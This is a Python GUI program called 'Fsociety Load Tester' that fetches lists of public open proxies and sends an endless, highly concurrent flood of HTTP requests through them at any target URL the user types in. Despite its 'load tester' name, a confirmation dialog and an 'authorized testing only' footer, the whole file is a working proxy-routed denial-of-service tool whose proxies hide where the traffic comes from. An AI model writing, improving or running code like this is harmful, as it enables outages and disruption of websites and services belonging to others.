
FSOCIETY LOAD TESTER v5.0 - GUI Edition
by Alexander K.
"""

import tkinter as tk
from tkinter import messagebox, scrolledtext
from PIL import Image, ImageTk
import threading
import asyncio
import aiohttp
import random
import time
import urllib.request
from datetime import datetime

class ProxyFetcher:
    @staticmethod
    def fetch():
        urls = [
            "https://api.proxyscrape.com/v2/?request=displayproxies&protocol=http&timeout=1000",
            "https://raw.githubusercontent.com/TheSpeedX/SOCKS-List/master/http.txt"
        ]
        proxies = []
        for url in urls:
            try:
                req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
                with urllib.request.urlopen(req, timeout=5) as r:
                    data = r.read().decode()
                    proxies.extend([l.strip() for l in data.split('\n') if ':' in l][:50])
            except: pass
        return list(set(proxies)) if proxies else []

class AttackWorker:
    def __init__(self):
        self.running = False
        self.stats = {"sent": 0, "success": 0, "failed": 0}
        self.proxies = []
        self.target = ""
        self.rpp = 100
        
    async def attack(self, update_cb):
        self.running = True
        semaphore = asyncio.Semaphore(500)
        
        async def send_one(proxy):
            if not self.running: return
            async with semaphore:
                try:
                    timeout = aiohttp.ClientTimeout(total=5)
                    proxy_url = f"http://{proxy}" if not proxy.startswith('http') else proxy
                    
                    async with aiohttp.ClientSession(timeout=timeout) as s:
                        headers = {"User-Agent": random.choice([
                            "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                            "fsociety-bot/5.0 (Authorized Pentest)"
                        ])}
                        async with s.get(self.target, headers=headers, proxy=proxy_url, ssl=False) as r:
                            self.stats["sent"] += 1
                            if r.status == 200:
                                self.stats["success"] += 1
                            else:
                                self.stats["failed"] += 1
                            if self.stats["sent"] % 10 == 0:
                                update_cb()
                except:
                    self.stats["failed"] += 1
                    self.stats["sent"] += 1
                    
        while self.running:
            tasks = []
            for p in self.proxies:
                for _ in range(min(self.rpp, 5)):
                    tasks.append(send_one(p))
            if tasks:
                await asyncio.gather(*tasks, return_exceptions=True)

class FsocietyApp:
    def __init__(self, root):
        self.root = root
        self.root.title("Fsociety Load Tester v5.0 - by Alexander K.")
        self.root.geometry("900x600")
        self.root.resizable(False, False)
        
        self.worker = AttackWorker()
        self.setup_ui()
        
    def setup_ui(self):
        # Canvas mit Hintergrund
        self.canvas = tk.Canvas(self.root, width=900, height=600)
        self.canvas.pack(fill="both", expand=True)
        
        # Lade das fsociety Bild (speichere das Bild oben als 'fsociety.png')
        try:
            bg = Image.open("fsociety.png")
            bg = bg.resize((900, 600), Image.Resampling.LANCZOS)
            self.bg_img = ImageTk.PhotoImage(bg)
            self.canvas.create_image(450, 300, image=self.bg_img)
        except:
            self.canvas.configure(bg="#1a0000")
            self.canvas.create_rectangle(0, 0, 900, 600, fill="#220000", stipple="gray25")
        
        # Halbtransparente UI-Box
        ui_bg = "#000000"
        self.main_box = tk.Frame(self.root, bg=ui_bg, bd=3, relief=tk.RIDGE)
        self.main_box.place(relx=0.5, rely=0.5, anchor="center", width=500, height=400)
        self.main_box.configure(highlightbackground="#ff0000", highlightthickness=3)
        
        # Titel
        tk.Label(self.main_box, text="⚡ FSOCIETY LOAD TESTER ⚡", 
                font=("Courier", 16, "bold"), fg="#ff0000", bg=ui_bg).pack(pady=5)
        tk.Label(self.main_box, text="by Alexander K.", 
                font=("Courier", 9), fg="#aa0000", bg=ui_bg).pack()
        
        # === TARGET ===
        tk.Label(self.main_box, text="🎯 TARGET URL", fg="#ff0000", bg=ui_bg, 
                font=("Courier", 10, "bold")).pack(pady=(15,0))
        self.target_entry = tk.Entry(self.main_box, width=40, bg="#330000", fg="#00ff00", 
                                    insertbackground="#00ff00", font=("Courier", 10))
        self.target_entry.pack()
        self.target_entry.insert(0, "http://localhost:8080")
        
        # === REQUESTS PER PROXY ===
        tk.Label(self.main_box, text="📊 REQUESTS PER PROXY", fg="#ff0000", bg=ui_bg,
                font=("Courier", 10, "bold")).pack(pady=(10,0))
        self.rpp_entry = tk.Entry(self.main_box, width=40, bg="#330000", fg="#00ff00",
                                 insertbackground="#00ff00", font=("Courier", 10))
        self.rpp_entry.pack()
        self.rpp_entry.insert(0, "100")
        
        # === PROXY STATUS ===
        self.proxy_label = tk.Label(self.main_box, text="🌐 Proxies: Not loaded", 
                                   fg="#ff6600", bg=ui_bg, font=("Courier", 9))
        self.proxy_label.pack(pady=5)
        
        # === BUTTONS ===
        btn_frame = tk.Frame(self.main_box, bg=ui_bg)
        btn_frame.pack(pady=15)
        
        # Auto Proxy Button
        self.proxy_btn = tk.Button(btn_frame, text="🔽 Load Proxies", command=self.load_proxies,
                                  bg="#330000", fg="#00ff00", font=("Courier", 10, "bold"),
                                  width=12, height=1)
        self.proxy_btn.pack(side=tk.LEFT, padx=5)
        
        # Start Button
        self.start_btn = tk.Button(btn_frame, text="▶ START ATTACK", command=self.start_attack,
                                  bg="#006600", fg="white", font=("Courier", 12, "bold"),
                                  width=14, height=2)
        self.start_btn.pack(side=tk.LEFT, padx=5)
        
        # Stop Button
        self.stop_btn = tk.Button(btn_frame, text="⏹ STOP", command=self.stop_attack,
                                 bg="#660000", fg="white", font=("Courier", 12, "bold"),
                                 width=10, height=2, state=tk.DISABLED)
        self.stop_btn.pack(side=tk.LEFT, padx=5)
        
        # === STATS ===
        self.stats_label = tk.Label(self.main_box, 
                                   text="Status: IDLE | Sent: 0 | Success: 0 | Failed: 0",
                                   fg="#00ffff", bg="#001a1a", font=("Courier", 10),
                                   width=50, height=2)
        self.stats_label.pack(pady=10)
        
        # === LOG ===
        self.log_box = scrolledtext.ScrolledText(self.main_box, width=55, height=8,
                                                bg="#000000", fg="#00ff00",
                                                font=("Courier", 8))
        self.log_box.pack()
        
        # Footer
        tk.Label(self.main_box, text="⚠️  Authorized testing only - Illegal use is punishable  ⚠️",
                fg="#ff0000", bg=ui_bg, font=("Courier", 8)).pack()
        
    def log(self, msg):
        t = datetime.now().strftime("%H:%M:%S")
        self.log_box.insert(tk.END, f"[{t}] {msg}\n")
        self.log_box.see(tk.END)
        
    def update_stats(self):
        s = self.worker.stats
        self.stats_label.config(
            text=f"Status: {'ATTACKING' if self.worker.running else 'IDLE'} | "
                 f"Sent: {s['sent']} | Success: {s['success']} | Failed: {s['failed']}"
        )
        
    def load_proxies(self):
        self.log("🔍 Loading proxies...")
        self.proxy_btn.config(state=tk.DISABLED)
        
        def fetch():
            return ProxyFetcher.fetch()
            
        thread = threading.Thread(target=lambda: self._fetch_done(fetch()))
        thread.start()
        
    def _fetch_done(self, proxies):
        self.worker.proxies = proxies
        if proxies:
            self.proxy_label.config(text=f"🌐 Proxies: {len(proxies)} loaded", fg="#00ff00")
            self.log(f"✅ {len(proxies)} proxies loaded")
        else:
            self.proxy_label.config(text="🌐 Proxies: None (direct mode)", fg="#ff6600")
            self.log("⚠️ No proxies found, using direct connection")
            self.worker.proxies = ["direct"]
        self.proxy_btn.config(state=tk.NORMAL)
        
    def start_attack(self):
        target = self.target_entry.get().strip()
        if not target:
            messagebox.showerror("Error", "Enter target URL!")
            return
            
        try:
            rpp = int(self.rpp_entry.get() or "100")
        except:
            rpp = 100
            
        if not self.worker.proxies:
            self.load_proxies()
            
        self.worker.target = target
        self.worker.rpp = rpp
        
        if not messagebox.askyesno("Confirm", f"Attack {target}?\n\nIs this your own server?"):
            return
            
        self.log(f"🚀 Starting attack on {target}")
        self.log(f"📊 {len(self.worker.proxies)} proxies | {rpp} req/proxy")
        
        self.start_btn.config(state=tk.DISABLED)
        self.stop_btn.config(state=tk.NORMAL)
        self.worker.stats = {"sent": 0, "success": 0, "failed": 0}
        
        def run():
            asyncio.set_event_loop(asyncio.new_event_loop())
            asyncio.get_event_loop().run_until_complete(
                self.worker.attack(self.update_stats)
            )
            
        threading.Thread(target=run, daemon=True).start()
        self.update_stats_loop()
        
    def update_stats_loop(self):
        if self.worker.running:
            self.update_stats()
            self.root.after(500, self.update_stats_loop)
            
    def stop_attack(self):
        self.log("🛑 Stopping attack...")
        self.worker.running = False
        self.start_btn.config(state=tk.NORMAL)
        self.stop_btn.config(state=tk.DISABLED)
        self.update_stats()
        self.log("✅ Attack stopped")

if __name__ == "__main__":
    root = tk.Tk()
    app = FsocietyApp(root)
    root.mainloop()
